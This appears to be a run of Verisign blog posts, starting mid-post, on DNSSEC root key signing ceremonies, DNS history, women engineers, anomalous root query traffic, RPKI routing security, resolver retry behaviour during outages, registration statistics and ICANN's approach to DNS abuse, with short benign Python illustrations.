A month or two before each ceremony, Verisign generates a file called the Key Signing Request (KSR). This is an XML document which includes the set of public key records (both KSK and ZSK) to be signed and then used during the next calendar quarter. The KSR is securely transmitted from Verisign to the Internet Assigned Numbers Authority (IANA), which is a function of ICANN that performs root zone management. IANA securely stores the KSR until it is needed for the upcoming key signing ceremony.
Each quarter is divided into nine 10-day “slots” (for some quarters, the last slot is extended by a day or two) and the XML file contains nine key “bundles” to be signed. Each bundle, or slot, has a signature inception and expiration timestamp, such that they overlap by at least five days. The first and last slots in each quarter are used to perform ZSK rollovers. During these slots we publish two ZSKs and one KSK in the root zone.
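The slot layout can be computed directly, as in the sketch below – a simple reconstruction inferred from the ceremony output shown later in this post, not Verisign’s actual tooling. Inceptions advance 10 days at a time and each signature is valid for 21 days, so consecutive slots overlap.

from datetime import date, timedelta

def quarterly_slots(quarter_start, slots=9, step_days=10, validity_days=21):
    bundles = []
    for i in range(slots):
        inception = quarter_start + timedelta(days=step_days * i)
        expiration = inception + timedelta(days=validity_days)
        bundles.append((i + 1, inception, expiration))
    return bundles

for n, inception, expiration in quarterly_slots(date(2022, 10, 1)):
    print(n, inception.isoformat(), expiration.isoformat())
# 1 2022-10-01 2022-10-22
# ...
# 9 2022-12-20 2023-01-10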
The root zone KSK private component is held inside secure Hardware Security Modules (HSMs). These HSMs are stored inside locked safes, which in turn are kept inside locked rooms. At a key signing ceremony, the HSMs are taken out of their safes and activated for use. This all occurs according to a pre-defined script with many detailed steps, as shown in the figure below.
Also stored inside the safe is a laptop computer, its operating system on non-writable media (i.e., DVD), and a set of credentials for the TCRs, stored on smart cards and locked inside individual safe deposit boxes. Once all the necessary items are removed from the safes, the equipment can be turned on and activated.
The laptop computer is booted from its operating system DVD and the HSM is connected via Ethernet for data transfer and serial port for console logging. The TCR credentials are used to activate the HSM. Once activated, a USB thumb drive containing the KSR file is connected to the laptop and the signing program is started.
The signing program reads the KSR, validates it, and then displays information about the keys about to be signed. This includes the signature inception and expiration timestamps, and the ZSK key tag values.
Validate and Process KSR /media/KSR/KSK46/ksr-root-2022-q4-0.xml...
# Inception Expiration ZSK Tags KSK Tag(CKA_LABEL)
1 2022-10-01T00:00:00 2022-10-22T00:00:00 18733,20826
2 2022-10-11T00:00:00 2022-11-01T00:00:00 18733
3 2022-10-21T00:00:00 2022-11-11T00:00:00 18733
4 2022-10-31T00:00:00 2022-11-21T00:00:00 18733
5 2022-11-10T00:00:00 2022-12-01T00:00:00 18733
6 2022-11-20T00:00:00 2022-12-11T00:00:00 18733
7 2022-11-30T00:00:00 2022-12-21T00:00:00 18733
8 2022-12-10T00:00:00 2022-12-31T00:00:00 18733
9 2022-12-20T00:00:00 2023-01-10T00:00:00 00951,18733
...PASSED.
It also displays an SHA256 hash of the KSR file and a corresponding “PGP (Pretty Good Privacy) Word List.” The PGP Word List is a convenient and efficient way of verbally expressing hexadecimal values:
SHA256 hash of KSR:
ADCE9749F3DE4057AB680F2719B24A32B077DACA0F213AD2FB8223D5E8E7CDEC
>> ringbolt sardonic preshrunk dinosaur upset telephone crackdown Eskimo rhythm gravity artist celebrate bedlamp pioneer dogsled component ruffled inception surmount revenue artist Camelot cleanup sensation watchword Istanbul blowtorch specialist trauma truncated spindle unicorn <<
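Anyone with a copy of the KSR can make the same check independently. The sketch below assumes a local copy of the file under the name shown in the output above; converting each byte of the digest to the PGP Word List (alternating between its even- and odd-position lists of 256 words) is a further step not reproduced here.

import hashlib

EXPECTED = "ADCE9749F3DE4057AB680F2719B24A32B077DACA0F213AD2FB8223D5E8E7CDEC"

with open("ksr-root-2022-q4-0.xml", "rb") as f:
    digest = hashlib.sha256(f.read()).hexdigest().upper()

print("match" if digest == EXPECTED else "MISMATCH", digest)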
At this point, a Verisign representative comes forward to verify the KSR. The following actions then take place:
1. The signing program outputs a new XML document, called the Signed Key Response (SKR). This document contains signatures over the DNSKEY resource record sets in each of the nine slots.
2. The SKR is saved to a USB thumb drive and given to a member of the Root Zone KSK Operations Security team.
3. Usually sometime the next day, IANA securely transmits the SKR back to Verisign.
4. Following several automatic and manual verification steps, the signature data is imported into Verisign’s root zone management system for use at the appropriate times in the next calendar quarter.
Keeping the internet’s DNS secure, stable, and resilient is a crucial aspect of Verisign’s role as the Root Zone Maintainer. We are honored to participate in the key signing ceremonies with ICANN and the TCRs and do our part to help the DNS operate as it should.
For more information on root key signing ceremonies, visit the IANA website. Visitors can watch video recordings of previous ceremonies and even sign up to witness the next ceremony live. It’s a great resource, and a unique opportunity to take part in a process that helps keep the internet safe for all.
The post Verisign’s Role in Securing the DNS Through Key Signing Ceremonies appeared first on Verisign Blog.
In 1987, CompuServe introduced GIF images, Steve Wozniak left Apple and IBM introduced the PS/2 personal computer with improved graphics and a 3.5-inch diskette drive. Behind the scenes, one more critical piece of internet infrastructure was quietly taking form to help establish the internet we know today.
November of 1987 saw the establishment of the Domain Name System protocol suite as internet standards. This was a development that not only would begin to open the internet to individuals and businesses globally, but also would arguably redefine communications, commerce and access to information for future generations.
Today, the DNS continues to be critical to the operation of the internet as a whole. It has a long and strong track record thanks to the work of the internet’s pioneers and the collaboration of different groups to create volunteer standards.
Let’s take a look back at the journey of the DNS over the years.
Prior to 1987, the internet was primarily used by government agencies and members of academia. Back then, the Network Information Center, managed by SRI International, manually maintained a directory of hosts and networks. While the early internet was transformative and forward-thinking, not everyone had access to it.
During that same time period, the U.S. Advanced Research Projects Agency Network, the forerunner to the internet we know now, was evolving into a growing network environment, and new naming and addressing schemes were being proposed. Seeing that there were thousands of interested institutions and companies wanting to explore the possibilities of networked computing, a group of ARPA networking researchers realized that a more modern, automated approach was needed to organize the network’s naming system for anticipated rapid growth.
Two Request for Comments documents, numbered RFC 1034 and RFC 1035, were published in 1987 by the informal Network Working Group, which soon after evolved into the Internet Engineering Task Force. Those RFCs, authored by computer scientist Paul V. Mockapetris, became the standards upon which DNS implementations have been built. It was Mockapetris, inducted into the Internet Hall of Fame in 2012, who specifically suggested a name space where database administration was distributed but could also evolve as needed.
In addition to allowing organizations to maintain their own databases, the DNS simplified the process of connecting a name that users could remember with a unique set of numbers – the Internet Protocol address – that web browsers needed to navigate to a website using a domain name. By not having to remember a seemingly random string of numbers, users could easily get to their intended destination, and more people could access the web. This has worked in a logical way for all internet users – from businesses large and small to everyday people – all around the globe.
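That mapping remains the everyday experience of using the DNS. A minimal sketch of the lookup, using only Python’s standard library:

import socket

# Resolve a memorable name to the numeric addresses that computers route by.
addresses = {info[4][0] for info in socket.getaddrinfo("blog.verisign.com", None)}
print(sorted(addresses))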
With these two aspects of the DNS working together – wide distribution and name-to-address mapping – the DNS quickly took shape and developed into the system we know today.
Thirty-five years of DNS development and progress is attributable to the collaboration of multiple stakeholders and interest groups – academia, technical community, governments, law enforcement and civil society, plus commercial and intellectual property interests – who continue even today to bring crucial perspectives to the table as it relates to the evolution of the DNS and the internet. These perspectives have lent themselves to critical security developments in the DNS, from assuring protection of intellectual property rights to the more recent stakeholder collaborative efforts to address DNS abuse.
Other major collaborative achievements involve the IETF, which has no formal membership roster or requirements, and is responsible for the technical standards that comprise the internet protocol suite, and the Internet Corporation for Assigned Names and Numbers, which plays a central coordination role in the bottom-up multistakeholder system governing the global DNS. Without constructive and productive voluntary collaboration, the internet as we know it simply isn’t possible.
Indeed, these cooperative efforts marshaled a brand of collaboration known today as “rough consensus.” That term, originally “rough consensus and running code,” gave rise to a more dynamic collaboration process than the “100% consensus from everyone” model. In fact, the term was adopted by the IETF in the early days of establishing the DNS to describe the formation of the dominant view of the working group and the need to quickly implement new technologies, which doesn’t always allow for lengthy discussions and debates. This approach is still in use today, proving its usefulness and longevity.
As we look back on how the DNS came to be and the processes that have kept it reliably running, it’s important to recognize the work done by the organizations and individuals that make up this community. We must also remember that the efforts continue to be powered by voluntary collaborations.
Commemorating anniversaries such as 35 years of the DNS protocol allows the multiple stakeholders and communities to pause and reflect on the enormity of the work and responsibility before us. Thanks to the pioneering minds who conceived and built the early infrastructure of the internet, and in particular to Paul Mockapetris’s fundamental contribution of the DNS protocol suite, the world has been able to establish a robust global economy that few could ever have imagined so many years ago.
The 35th anniversary of the publication of RFCs 1034 and 1035 reminds us of the contributions that the DNS has made to the growth and scale of what we know today as “the internet.” That’s a moment worth celebrating.
The post Celebrating 35 Years of the DNS Protocol appeared first on Verisign Blog.
Today, as the world celebrates International Women in Engineering Day, we recognize and honor women engineers at Verisign, whose own stories have helped shape dreams and encouraged young women and girls to take up engineering careers.
Here are three of their stories:
When Shama Khakurel was in high school, she aspired to join the medical field. But she quickly realized that classes involving math or engineering came easiest to her, much more so than her work in biology or other subjects. It wasn’t until she took a summer computer programming course called “Lotus and dBase Programming” that she realized her career aspirations had officially changed; from that point on, she wanted to be an engineer.
In the nearly 20 years she’s been at Verisign, she’s expanded her skills, challenged herself, pursued opportunities – and always had the support of managers who mentored her along the way.
“Verisign has given me every opportunity to grow,” Shama says. And even though she continues to “learn something new every day,” she also provides mentorship to younger engineering employees.
Women tend to shy away from engineering roles, she says, because they think that math and science are harder subjects. “They seem to follow and believe that myth, but there is a lot of opportunity for a woman in this field.”
For Vinaya Shenoy, an engineering manager who has worked for Verisign for 17 years, a passion for math and science at a young age steered her toward a career in computer science engineering.
She draws inspiration from other women who are industry leaders and immigrants from India, and who rose to the top ranks through their determination and leadership skills. She credits their stories with helping her see what all women are capable of, especially in unconventional or unexpected areas.
“Engineering is not just coding. There are a lot of areas within engineering that you can explore and pursue,” she says. “If problem-solving and creating are your passions, you can harness the power of technology to solve problems and give back to the community.”
Tuyet Vuong is one of those people who enjoys problem-solving. As a young girl and the child of two physics teachers, she would often build small gadgets – perhaps her own clock or a small fan – from things she would find around the house.
Today, the challenges are bigger and have a greater impact, and she still finds herself enjoying them.
“Engineering is a fun, exciting and rewarding discipline where you can explore and build new things that are helpful to society,” says Tuyet. And sharing the insights and experiences of so many talented people – both men and women – is what makes the role that much more rewarding.
That sense of fulfillment also comes from breaking down stereotypes, such as the attitude she encountered growing up in Vietnam that women were suitable for only a limited number of careers. That’s why she’s a firm believer that mentoring and encouraging young women engineers isn’t just the responsibility of other women.
“The effort should come from both genders,” she says. “The effort shouldn’t come from women alone.”
At Verisign, we see the real impact of all our women engineers’ contributions when it comes to ensuring that the internet is secure, stable and resilient. Today and every day, we celebrate Verisign’s women engineers. We thank you for all you’ve done and everything you’re yet to accomplish.
If you’re interested in pursuing your passion for engineering, view our open career opportunities here.
The post Celebrating Women Engineers Today and Every Day at Verisign appeared first on Verisign Blog.
This blog was also published by APNIC.
With so much traffic on the global internet day after day, it’s not always easy to spot the occasional irregularity. After all, there are numerous layers of complexity that go into the serving of webpages, with multiple companies, agencies and organizations each playing a role.
That’s why when something does catch our attention, it’s important that the various entities work together to explore the cause and, more importantly, try to identify whether it’s a malicious actor at work, a glitch in the process or maybe even something entirely intentional.
That’s what occurred last year when Internet Corporation for Assigned Names and Numbers (ICANN) staff and contractors were analyzing names in Domain Name System (DNS) queries seen at the ICANN Managed Root Server, and the analysis program ran out of memory for one of their data files. After some investigating, they found the cause to be a very large number of mysterious queries for unique names such as f863zvv1xy2qf.surgery, bp639i-3nirf.hiphop, qo35jjk419gfm.net and yyif0aijr21gn.com.
While these were queries for names in existing top-level domains, the first label consisted of 12 or 13 random-looking characters. After ICANN shared their discovery with the other root server operators, Verisign took a closer look to help understand the situation.
One of the first things we noticed was that all of these mysterious queries were of type NS and came from a single autonomous system, AS 15169, assigned to Google LLC. Additionally, we confirmed that this behavior was occurring consistently for numerous TLDs. (See Fig. 1)
Although this phenomenon was newly uncovered, analysis of historical data showed these traffic patterns actually began in late 2019. (See Fig. 2)
Perhaps the most interesting discovery, however, was that these specific query names were not also seen at the .com and .net name servers operated by Verisign. The data in Figure 3 shows the fraction of queried names that appear at A-root and J-root and also appear on the .com and .net name servers. For second-level labels of 12 and 13 characters, this fraction is essentially zero. The graphs also show queries for names with second-level label lengths of 10 and 11 characters, which are likewise absent from the TLD data.
The final mysterious aspect to this traffic is that it deviated from our normal expectation of caching. Remember that these are queries to a root name server, which returns a referral to the delegated name servers for a TLD. For example, when a root name server receives a query for yyif0aijr21gn.com, the response is a list of the name servers that are authoritative for the .com zone. The records in this response have a time to live of two days, meaning that the recursive name server can cache and reuse this data for that amount of time.
However, in this traffic we see queries for .com domain names from AS 15169 at the rate of about 30 million per day. (See Fig. 4) It is well known that Google Public DNS has thousands of backend servers and limits TTLs to a maximum of six hours. Assuming 4,000 backend servers each cached a .com referral for six hours, we might expect about 16,000 queries over a 24-hour period. The observed count is about 2,000 times higher by this back-of-the-envelope calculation.
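The arithmetic behind that estimate is simple enough to write down; the 4,000-server figure is the assumption stated above.

backend_servers = 4_000
referral_ttl_hours = 6
expected_queries_per_day = backend_servers * (24 // referral_ttl_hours)
observed_queries_per_day = 30_000_000

print(expected_queries_per_day)                                    # 16,000
print(round(observed_queries_per_day / expected_queries_per_day))  # roughly 2,000x higher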
From our initial analysis, it was unclear if these queries represented legitimate end-user activity, though we were confident that source IP address spoofing was not involved. However, since the query names shared some similarities to those used by botnets, we could not rule out malicious activity.
These findings were presented last year at the DNS-OARC 35a virtual meeting. In the conference chat room after the talk, the missing piece of this puzzle was mentioned by a conference participant. There is a Google webpage describing its public DNS service that talks about prepending nonce (i.e., random) labels for cache misses to increase entropy. In what came to be known as “the Kaminsky Attack,” an attacker can cause a recursive name server to emit queries for names chosen by the attacker. Prepending a nonce label adds unpredictability to the queries, making it very difficult to spoof a response. Note, however, that nonce prepending only works for queries where the reply is a referral.
In addition, Google DNS has implemented a form of query name minimization (see RFC 7816 and RFC 9156). As such, if a user requests the IP address of www.example.com and Google DNS decides this warrants a query to a root name server, it takes the name, strips all labels except for the TLD and then prepends a nonce string, resulting in something like u5vmt7xanb6rf.com. A root server’s response to that query is identical to one using the original query name.
Now, we are able to explain nearly all of the mysterious aspects of this query traffic from Google. We see random second-level labels because of the nonce strings that are designed to prevent spoofing. The 12- and 13-character-long labels are most likely the result of converting a 64-bit random value into an unpadded ASCII label with encoding similar to Base32. We don’t observe the same queries at TLD name servers because of both the nonce prepending and query name minimization. The query type is always NS because of query name minimization.
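A quick sketch makes the label-length observation concrete. Encoding 64 random bits with unpadded Base32 produces a 13-character label; this illustrates the hypothesis above, not Google’s actual code, and the observed 12-character names presumably come from a slightly different encoding of the same idea.

import base64
import os

def nonce_label():
    raw = os.urandom(8)                               # a 64-bit random value
    return base64.b32encode(raw).decode().rstrip("=").lower()

label = nonce_label()
print(f"{label}.com", len(label))                     # e.g. u5vmt7xanb6rf.com 13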
With that said, there’s still one aspect that eludes explanation: the high query rate (2000x for .com) and apparent lack of caching. And so, this aspect of the mystery continues.
Even though we haven’t fully closed the books on this case, one thing is certain: without the community’s teamwork to put the pieces of the puzzle together, explanations for this strange traffic may have remained unknown today. The case of the mysterious DNS root query traffic is a perfect example of the collaboration that’s required to navigate today’s ever-changing cyber environment. We’re grateful and humbled to be part of such a dedicated community that is intent on ensuring the security, stability and resiliency of the internet, and we look forward to more productive teamwork in the future.
The post More Mysterious DNS Root Query Traffic from a Large Cloud/DNS Operator appeared first on Verisign Blog.
The Domain Name System has provided the fundamental service of mapping internet names to addresses from almost the earliest days of the internet’s history. Billions of internet-connected devices use DNS continuously to look up Internet Protocol addresses of the named resources they want to connect to — for instance, a website such as blog.verisign.com. Once a device has the resource’s address, it can then communicate with the resource using the internet’s routing system.
Just as ensuring that DNS is secure, stable and resilient is a priority for Verisign, so is making sure that the routing system has these characteristics. Indeed, DNS itself depends on the internet’s routing system for its communications, so routing security is vital to DNS security too.
To better understand how these challenges can be met, it’s helpful to step back and remember what the internet is: a loosely interconnected network of networks that interact with each other at a multitude of locations, often across regions or countries.
Packets of data are transmitted within and between those networks, which utilize a collection of technical standards and rules called the IP suite. Every device that connects to the internet is uniquely identified by its IP address, which can take the form of either a 32-bit IPv4 address or a 128-bit IPv6 address. Similarly, every network that connects to the internet has an Autonomous System Number, which is used by routing protocols to identify the network within the global routing system.
The primary job of the routing system is to let networks know the available paths through the internet to specific destinations. Today, the system largely relies on a decentralized and implicit trust model — a hallmark of the internet’s design. No centralized authority dictates how or where networks interconnect globally, or which networks are authorized to assert reachability for an internet destination. Instead, networks share knowledge with each other about the available paths from devices to destination: They route “by rumor.”
Under the Border Gateway Protocol (BGP), the internet’s de facto inter-domain routing protocol, local routing policies decide where and how internet traffic flows, but each network independently applies its own policies on what actions it takes, if any, with traffic that passes through its network.
BGP has scaled well over the past three decades because 1) it operates in a distributed manner, 2) it has no central point of control (nor failure), and 3) each network acts autonomously. While networks may base their routing policies on an array of pricing, performance and security characteristics, ultimately BGP can use any available path to reach a destination. Often, the choice of route may depend upon personal decisions by network administrators, as well as informal assessments of technical and even individual reliability.
Two prominent types of operational and security incidents occur in the routing system today: route hijacks and route leaks. Route hijacks reroute internet traffic to an unintended destination, while route leaks propagate routing information to an unintended audience. Both types of incidents can be accidental as well as malicious.
Preventing route hijacks and route leaks requires considerable coordination in the internet community, a concept that fundamentally goes against the BGP’s design tenets of distributed action and autonomous operations. A key characteristic of BGP is that any network can potentially announce reachability for any IP addresses to the entire world. That means that any network can potentially have a detrimental effect on the global reachability of any internet destination.
Fortunately, there is a solution already gaining considerable deployment momentum: the Resource Public Key Infrastructure (RPKI). RPKI provides an internet number resource certification infrastructure, analogous to the traditional PKI for websites. RPKI enables number resource allocation authorities and networks to specify Route Origin Authorizations (ROAs) that are cryptographically verifiable. ROAs can then be used by relying parties to confirm that the routing information shared with them is from the authorized origin.
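The check a relying party performs with ROA data is conceptually simple. The sketch below follows the route origin validation logic described in RFC 6811; the ROA entries and ASN are made-up documentation values, not real allocations.

from ipaddress import ip_network

ROAS = [
    # (authorized prefix, maximum prefix length, authorized origin ASN)
    (ip_network("192.0.2.0/24"), 24, 64500),
]

def validate(prefix, origin_asn):
    prefix = ip_network(prefix)
    covering = [roa for roa in ROAS if prefix.subnet_of(roa[0])]
    if not covering:
        return "not found"            # no ROA covers this prefix
    for _, max_length, asn in covering:
        if prefix.prefixlen <= max_length and origin_asn == asn:
            return "valid"
    return "invalid"                  # covered, but origin or length does not match

print(validate("192.0.2.0/24", 64500))     # valid
print(validate("192.0.2.0/25", 64500))     # invalid: more specific than the ROA allows
print(validate("192.0.2.0/24", 64501))     # invalid: wrong origin AS
print(validate("198.51.100.0/24", 64500))  # not found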
RPKI is standards-based and appears to be gaining traction in improving BGP security. But it also brings new challenges.
Specifically, RPKI creates new external and third-party dependencies that, as adoption continues, ultimately replace the traditionally autonomous operation of the routing system with a more centralized model. If too tightly coupled to the routing system, these dependencies may impact the robustness and resilience of the internet itself. Also, because RPKI relies on DNS and DNS depends on the routing system, network operators need to be careful not to introduce tightly coupled circular dependencies.
With RPKI, the Regional Internet Registries (RIRs), the organizations responsible for top-level number resource allocation, take on a role with direct operational implications for the routing system. Unlike DNS, the global RPKI as deployed does not have a single root of trust. Instead, it has multiple trust anchors, one operated by each of the RIRs. RPKI therefore brings significant new security, stability and resiliency requirements to the RIRs, updating their traditional role of simply allocating ASNs and IP addresses with new operational requirements for ensuring the availability, confidentiality, integrity, and stability of this number resource certification infrastructure.
As part of improving BGP security and encouraging adoption of RPKI, the routing community started the Mutually Agreed Norms for Routing Security initiative in 2014. Supported by the Internet Society, MANRS aims to reduce the most common routing system vulnerabilities by creating a culture of collective responsibility towards the security, stability and resiliency of the global routing system. MANRS is continuing to gain traction, guiding internet operators on what they can do to make the routing system more reliable.
Routing by rumor has served the internet well, and a decade ago it may have been ideal because it avoided systemic dependencies. However, the increasingly critical role of the internet and the evolving cyberthreat landscape require a better approach for protecting routing information and preventing route leaks and route hijacks. As network operators deploy RPKI with security, stability and resiliency, the billions of internet-connected devices that use DNS to look up IP addresses can then communicate with those resources through networks that not only share routing information with one another as they’ve traditionally done, but also do something more. They’ll make sure that the routing information they share and use is secure — and route without rumor.
The post Routing Without Rumor: Securing the Internet’s Routing System appeared first on Verisign Blog.
When an outage affects a component of the internet infrastructure, there can often be downstream ripple effects affecting other components or services, either directly or indirectly. We would like to share our observations of this impact in the case of two recent such outages, measured at various levels of the DNS hierarchy, and discuss the resultant increase in query volume due to the behavior of recursive resolvers.
In early October 2021, the internet saw two significant outages, affecting Facebook’s services and the .club top-level domain, neither of which resolved properly for a period of time. Throughout these outages, Verisign and other DNS operators reported significant increases in query volume. We provided consistent responses throughout, with the correct delegation data pointing to the correct name servers.
While these higher query rates do not impact Verisign’s ability to respond, they raise a broader operational question – whether the repeated nature of these queries, indicative of a lack of negative caching, might potentially be mistaken for a denial-of-service attack.
On Oct. 4, 2021, Facebook experienced a widespread outage, lasting nearly six hours. During this time most of its systems were unreachable, including those that provide Facebook’s DNS service. The outage impacted facebook.com, instagram.com, whatsapp.net and other domain names.
Under normal conditions, the .com and .net authoritative name servers answer about 7,000 queries per second in total for the three domain names previously mentioned. During this particular outage, however, query rates for these domain names reached upwards of 900,000 queries per second (an increase of more than 100x), as shown in Figure 1 below.
Figure 1: Rate of DNS queries for Facebook’s domain names during the 10/4/21 outage.
During this outage, recursive name servers received no response from Facebook’s name servers – instead, those queries timed out. In situations such as this, recursive name servers generally return a SERVFAIL or “server failure” response, presented to end users as a “this site can’t be reached” error.
Figure 1 shows an increasing query rate over the duration of the outage. Facebook uses relatively low time-to-live (TTL) values on its DNS records – from one to five minutes – a setting that tells DNS resolvers how long they may cache an answer before issuing a new query. This in turn means that, five minutes into the outage, all relevant records would have expired from all recursive resolver caches – or at least from those that honor the publisher’s TTLs. It is not immediately clear why the query rate continues to climb throughout the outage, nor whether it would eventually have plateaued had the outage continued.
To get a sense of where the traffic comes from, we group query sources by their autonomous system number. The top five autonomous systems, along with all others grouped together, are shown in Figure 2.
Figure 2: Rate of DNS queries for Facebook’s domain names grouped by source autonomous system.
From Figure 2 we can see that, at their peak, queries for these domain names to Verisign’s .com and .net authoritative name servers from the most active recursive resolvers – those of Google and Cloudflare – increased around 7,000x and 2,000x respectively over their average non-outage rates.
On Oct. 7th, 2021, three days after Facebook’s outage, the .club and .hsbc TLDs also experienced a three-hour outage. In this case, the relevant authoritative servers remained reachable, but responded with SERVFAIL messages. The effect on recursive resolvers was essentially the same: Since they did not receive useful data, they repeatedly retried their queries to the parent zone. During the incident, the Verisign-operated A-root and J-root servers observed an increase in queries for .club domain names of 45x, from 80 queries per second before, to 3,700 queries per second during the outage.
Figure 3: Rate of DNS queries to A and J root servers during the 10/7/2021 .club outage.
Similar to the previous example, this outage also demonstrated an increasing query rate over its duration. In this case, it might be explained by the fact that the records for .club’s delegation in the root zone use two-day TTLs. However, the theoretical analysis is complicated by the fact that authoritative name server records in child zones use longer TTLs (six days), while authoritative name server address records use shorter TTLs (10 minutes). Here we do not observe a significant amount of query traffic from Google sources; instead, the increased query volume is largely attributable to the long tail of recursive resolvers in “All Others.”
Figure 4: Rate of DNS queries for .club and .hsbc, grouped by source autonomous system.
Earlier this year Verisign implemented a botnet sinkhole and analyzed the received traffic. This botnet utilizes more than 1,500 second-level domain names, likely for command and control. We observed queries from approximately 50,000 clients every day. As an experiment, we configured our sinkhole name servers to return SERVFAIL and REFUSED responses for two of the botnet domain names.
When configured to return a valid answer, each domain name’s query rate peaks at about 50 queries per second. However, when configured to return SERVFAIL, the query rate for a single domain name increases to 60,000 per second, as shown in Figure 5. Further, the query rate for the botnet domain name also increases at the TLD and root name servers, even though those services are functioning normally and data relevant to the botnet domain name has not changed – just as with the two outages described above. Figure 6 shows data from the same experiment (although for a different date), colored by the source autonomous system. Here, we can see that approximately half of the increased query traffic is generated by one organization’s recursive resolvers.
Figure 5: Query rates to name servers for one domain name experimentally configured to return SERVFAIL.
Figure 6: Query rates to botnet sinkhole name servers, grouped by autonomous system, when one domain name is experimentally configured to return SERVFAIL.
These two outages and one experiment all demonstrate that recursive name servers can become unnecessarily aggressive when responses to queries are not received due to connectivity issues, timeouts, or misconfigurations.
In each of these three cases, we observe significant query rate increases from recursive resolvers across the internet – with particular contributors, such as Google Public DNS and Cloudflare’s resolver, identified on each occasion.
Often in cases like this we turn to internet standards for guidance. RFC 2308 is a 1998 Standards Track specification that describes negative caching of DNS queries. The RFC covers name errors (e.g., NXDOMAIN), no data, server failures, and timeouts. Unfortunately, it states that negative caching for server failures and timeouts is optional. We have submitted an Internet-Draft that proposes updating RFC 2308 to require negative caching for DNS resolution failures.
We believe it is important for the security, stability and resiliency of the internet’s DNS infrastructure that the implementers of recursive resolvers and public DNS services carefully consider how their systems behave in circumstances where none of a domain name’s authoritative name servers are providing responses, yet the parent zones are providing proper referrals. We feel it is difficult to rationalize the patterns that we are currently observing, such as hundreds of queries per second from individual recursive resolver sources. The global DNS would be better served by more appropriate rate limiting, and algorithms such as exponential backoff, to address these types of cases we’ve highlighted here. Verisign remains committed to leading and contributing to the continued security, stability and resiliency of the DNS for all global internet users.
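Below is a minimal sketch of the behavior we are advocating, written as illustrative Python rather than any particular resolver’s implementation: cache a resolution failure briefly and back off exponentially on repeated failures, instead of retrying the upstream servers at full rate.

import time

FAILURE_CACHE = {}      # qname -> (earliest retry time, current backoff in seconds)
INITIAL_BACKOFF = 5
MAX_BACKOFF = 300

def should_retry_upstream(qname):
    entry = FAILURE_CACHE.get(qname)
    return entry is None or time.monotonic() >= entry[0]

def record_failure(qname):
    _, backoff = FAILURE_CACHE.get(qname, (0.0, INITIAL_BACKOFF / 2))
    backoff = min(backoff * 2, MAX_BACKOFF)          # 5s, 10s, 20s, ... up to 5 minutes
    FAILURE_CACHE[qname] = (time.monotonic() + backoff, backoff)

def record_success(qname):
    FAILURE_CACHE.pop(qname, None)                   # failures are forgotten on success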
This piece was co-authored by Verisign Fellow Duane Wessels and Verisign Distinguished Engineers Matt Thomas and Yannis Labrou.
The post Observations on Resolver Behavior During DNS Outages appeared first on Verisign Blog.
Today, we released the latest issue of The Domain Name Industry Brief, which shows that the third quarter of 2021 closed with 364.6 million domain name registrations across all top-level domains, a decrease of 2.7 million domain name registrations, or 0.7%, compared to the second quarter of 2021.1,2 Domain name registrations have decreased by 6.1 million, or 1.6%, year over year.1,2
Check out the latest issue of The Domain Name Industry Brief to see domain name stats from the third quarter of 2021, including:
The Domain Name Industry Brief this quarter also includes an overview of the ongoing community work to mitigate DNS security threats.
To see past issues of The Domain Name Industry Brief, please visit verisign.com/dnibarchives.
The post Verisign Q3 2021 The Domain Name Industry Brief: 364.6 Million Domain Name Registrations in the Third Quarter of 2021 appeared first on Verisign Blog.
For over a decade, the Internet Corporation for Assigned Names and Numbers (ICANN) and its multi-stakeholder community have engaged in an extended dialogue on the topic of DNS abuse, and the need to define, measure and mitigate DNS-related security threats. With increasing global reliance on the internet and DNS for communication, connectivity and commerce, the members of this community have important parts to play in identifying, reporting and mitigating illegal or harmful behavior, within their respective roles and capabilities.
As we consider the path forward on necessary and appropriate steps to improve mitigation of DNS abuse, it’s helpful to reflect briefly on the origins of this issue within ICANN, and to recognize the various and relevant community inputs to our ongoing work.
As a starting point, it’s important to understand ICANN’s central role in preserving the security, stability, resiliency and global interoperability of the internet’s unique identifier system, and also the limitations established within ICANN’s bylaws. ICANN’s primary mission is to ensure the stable and secure operation of the internet’s unique identifier systems, but as expressly stated in its bylaws, ICANN “shall not regulate (i.e., impose rules and restrictions on) services that use the internet’s unique identifiers or the content that such services carry or provide, outside the express scope of Section 1.1(a).” As such, ICANN’s role is important, but limited, when considering the full range of possible definitions of “DNS Abuse,” and developing a comprehensive understanding of security threat categories and the roles and responsibilities of various players in the internet infrastructure ecosystem is required.
In support of this important work, ICANN’s generic top-level domain (gTLD) contracted parties (registries and registrars) continue to engage with ICANN, and with other stakeholders and community interest groups, to address key factors related to effective and appropriate DNS security threat mitigation, including:
To better understand the various roles, responsibilities and processes, it’s important to first define illegal and abusive online activity. While perspectives may vary across our wide range of interest groups, the emerging consensus on definitions and terminology is that these activities can be categorized as DNS Security Threats, Infrastructure Abuse, Illegal Content, or Abusive Content, with ICANN’s remit generally limited to the first two categories.
Behavior within each of these categories constitutes abuse, and it is incumbent on members of the community to actively work to combat and mitigate these behaviors where they have the capability, expertise and responsibility to do so. We recognize the benefit of coordination with other entities, including ICANN within its bylaw-mandated remit, across their respective areas of responsibility.
The ICANN Organization has been actively involved in advancing work on DNS abuse, including the 2017 initiation of the Domain Abuse Activity Reporting (DAAR) system by the Office of the Chief Technology Officer. DAAR is a system for studying and reporting on domain name registration and security threats across top-level domain (TLD) registries, with an overarching purpose to develop a robust, reliable, and reproducible methodology for analyzing security threat activity, which the ICANN community may use to make informed policy decisions. The first DAAR reports were issued in January 2018 and they are updated monthly. Also in 2017, ICANN published its “Framework for Registry Operators to Address Security Threats,” which provides helpful guidance to registries seeking to improve their own DNS security posture.
The ICANN Organization also plays an important role in enforcing gTLD contract compliance and implementing policies developed by the community via its bottom-up, multi-stakeholder processes. For example, over the last several years, it has conducted registry and registrar audits of the anti-abuse provisions in the relevant agreements.
The ICANN Organization has also been a catalyst for increased community attention and action on DNS abuse, including initiating the DNS Security Facilitation Initiative Technical Study Group, which was formed to investigate mechanisms to strengthen collaboration and communication on security and stability issues related to the DNS. Over the last two years, there have also been multiple ICANN cross-community meeting sessions dedicated to the topic, including the most recent session hosted by the ICANN Board during its Annual General Meeting in October 2021. Also, in 2021, ICANN formalized its work on DNS abuse into a dedicated program within the ICANN Organization. These enforcement and compliance responsibilities are very important to ensure that all of ICANN’s contracted parties are living up to their obligations, and that any so-called “bad actors” are identified and remediated or de-accredited and removed from serving the gTLD registry or registrar markets.
